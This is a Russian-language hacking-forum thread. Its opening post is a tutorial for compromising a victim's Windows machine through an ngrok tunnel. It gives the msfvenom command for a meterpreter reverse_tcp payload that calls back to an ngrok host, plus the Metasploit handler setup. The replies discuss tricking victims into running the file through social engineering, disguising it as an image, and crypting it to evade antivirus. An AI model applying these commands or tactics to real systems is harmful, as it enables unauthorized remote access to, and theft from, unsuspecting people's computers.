• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Взлом при помощи Metasploit + Ngrok.

3xpl01t

Местный
Сообщения
34
Реакции
73
0 руб.
Telegram
Привет хацкер, сегодня мы рассмотрим возможность устанавливать TCP соединение обходя NAT.
42e787b6-9c79-4cdd-bff8-2bfed14c2b81.png


Нам понадобятся: Metasploit, Ngrok.

Ngrok — это платформа, которая с помощью установленной утилиты, позволяет, организовать удалённый доступ на веб-сервер или какой-то другой сервис, запущенный ПК. Доступ организуется через созданный при запуске ngrok безопасный туннель. ПК, при этом, может находиться за NAT’ом, и не иметь статического IP адреса.

Metasploit Project — проект, посвящённый информационной безопасности. Создан для предоставления информации об уязвимостях, помощи в создании сигнатур для IDS, создания и тестирования эксплойтов.

Приступим!
Для начала нам понадобится Ngrok, для того, чтобы его установить, переходим на официальный сайт проекта.
6d62ad32-1422-457e-b481-597c56068a3f.png


Здесь нам необходимо выполнить простую процедуру регистрации:
39e646da-dd37-49ad-8c52-07d4157147c4.png


Теперь перейдём к установке, исходя из вашей битности кали, выбираем именно нужную версию:
cd1863cb-1559-47fd-8ae4-c8d4269bc343.png


Скачиваем, распаковываем, вводим токен, профит!11! (Все подробные моменты установки есть выше на картинке)

Теперь нам нужно поднять tcp соединение, делаем это командой в терминале:
./ngrok tcp 4444
Где 4444 - номер порта, tcp - тип соединения.

76f8aa9c-7636-4134-a764-cde81c9d96d1.png


Обязательно дождись статуса online!

В этом окне нам понадобится лишь это:
tcp://0.tcp.ngrok.io:12529
У вас будет другой порт.

Это значит, что все запросы, которые отправляются на 0.tcp.ngrok.io через порт 12529 (в моём случае), будет перенаправлен на вашу тачку с портом который мы указали при запуске ngrok (4444). Терминал не закрываем, двигаемся дальше.

Открываем новый терминал сочетанием клавиш Shift + Ctrl + N
Здесь нам нужно создать пейлоад.

Пейлоад / Полезная нагрузка (payload) — часть червя, которая производит деструктивные действия с данными, копирование информации с заражённого компьютера и т. д. (в отличие от «транспортной части червя» («инфекционной» части, эксплойта), которая занимается его доставкой на атакуемую машину и заражением машины.

msfvenom -p windows /meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=ВАШПОРТ -f exe> payload.exe

ee7e151f-0b46-467b-a2bc-be7d3e2d7e1d.png


Пейлоад готов! Осталось его запустить на другой машине, и сессия метерпретер у вас в кармане, но перед этим, нам нужно запустить "слушатель", который будет прослушивать порт 4444 для соединений.
Делаем мы это командами в терминале:
Форматирование (BB-код):
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit

24513682-58e0-4c5a-957c-8fe6cf81467e.png


Теперь, когда слушатель запущен, все TCP соединения перенаправляются нам на машину. Если пользователь запустит наш пейлоад, мы получаем активную сессию meterpreter:
fca5e921-ad71-4639-9153-cf1a4fec417d.png


30ab3cb2-7aa5-4573-838a-c050bf8571ec.png


Вот и всё, жертва взломана, мы довольны.
Это одно из многочисленных способов использования Ngrok, для заражения машин.

 

Вандалл

Участник
Сообщения
4
Реакции
1
0 руб.
я уже прям вижу. Жертва такая: вау,пейлоад прилетел,надо срочно запустить!!!! или я не понял,что имелось ввиду под словами : "если жертва запустит наш пейлоад...". Вопрос,а если не запустит? Как заставить ее это сделать,если я нахожусь через 3 бетонных стены от нее?
 

3xpl01t

Местный
Сообщения
34
Реакции
73
0 руб.
Telegram
я уже прям вижу. Жертва такая: вау,пейлоад прилетел,надо срочно запустить!!!! или я не понял,что имелось ввиду под словами : "если жертва запустит наш пейлоад...". Вопрос,а если не запустит? Как заставить ее это сделать,если я нахожусь через 3 бетонных стены от нее?

Неужели тебе не знакомо слово СИ? Или мне ещё писать про то, как сделать так, чтобы жертва запустила файл? Да и вообще, в этой статье я рассказал о способе обхода NAT, и последующего создания пейлоада. Как заставить жертву запустить файлфайл - это уже ты сам должен подумать.
 

kan500

Участник
Сообщения
13
Реакции
2
0 руб.
Telegram
Актуально, что тут сказать, хуле)
 

Вандалл

Участник
Сообщения
4
Реакции
1
0 руб.
Неужели тебе не знакомо слово СИ? Или мне ещё писать про то, как сделать так, чтобы жертва запустила файл? Да и вообще, в этой статье я рассказал о способе обхода NAT, и последующего создания пейлоада. Как заставить жертву запустить файлфайл - это уже ты сам должен подумать.
твоя правда. ок,с системой доставки -это одна проблема. есть еще одна. через нгрок возможно запустить токо разовую сессию. если сессию прервать, выключить комп,потом опять запустить, тел жертвы коннектиться уже не будет. что я делаю не так,чтоб получить еще сессии? зависит ли это от того,что после перезахода в нгрок, порт на нем меняется (пятизначный который) ?
 

3xpl01t

Местный
Сообщения
34
Реакции
73
0 руб.
Telegram
твоя правда. ок,с системой доставки -это одна проблема. есть еще одна. через нгрок возможно запустить токо разовую сессию. если сессию прервать, выключить комп,потом опять запустить, тел жертвы коннектиться уже не будет. что я делаю не так,чтоб получить еще сессии? зависит ли это от того,что после перезахода в нгрок, порт на нем меняется (пятизначный который) ?

При выключении машины нажимаешь на "Сохранить текущие состояние", и будет тебе счастье.
 

Fathak

Участник
Сообщения
68
Реакции
33
0 руб.
я уже прям вижу. Жертва такая: вау,пейлоад прилетел,надо срочно запустить!!!! или я не понял,что имелось ввиду под словами : "если жертва запустит наш пейлоад...". Вопрос,а если не запустит? Как заставить ее это сделать,если я нахожусь через 3 бетонных стены от нее?
Способов куча блин! Можно под видом картинки допустим отправить! Тут проблема в том что пейлоад палиться нужно либо файл криптовать либо исходники чистить.
 

Вандалл

Участник
Сообщения
4
Реакции
1
0 руб.
При выключении машины нажимаешь на "Сохранить текущие состояние", и будет тебе счастье.
я расстроен... чел, у меня нет кнопки при выходе "сохранить текущее состояние" . есть Отмена, Перезапустить и Выход. Где,как настроить это все можно? я поищу конечно мануалы, но ты все равно ели не затруднит,дай наводку, куда и что искать в связи с этой проблемой
 

3xpl01t

Местный
Сообщения
34
Реакции
73
0 руб.
Telegram
я расстроен... чел, у меня нет кнопки при выходе "сохранить текущее состояние" . есть Отмена, Перезапустить и Выход. Где,как настроить это все можно? я поищу конечно мануалы, но ты все равно ели не затруднит,дай наводку, куда и что искать в связи с этой проблемой
Хз какую ты виртуалку юзаешь, но на Virtual Box есть такое.
 

Вандалл

Участник
Сообщения
4
Реакции
1
0 руб.
Хз какую ты виртуалку юзаешь, но на Virtual Box есть такое.
это не виртуалка... это чистая кали, установленная на жесткий диск. ладно. вроде как нарыл инфу что можно режим гибернации сделать, буду пробовать.
 

Form

Участник
Сообщения
42
Реакции
29
0 руб.
А если человек вообще не "предохраняется" стандартные средства безопасности винды будут хрюкать на картинку с пейлоадером? Может уже кто пробовал?
 
Сверху Снизу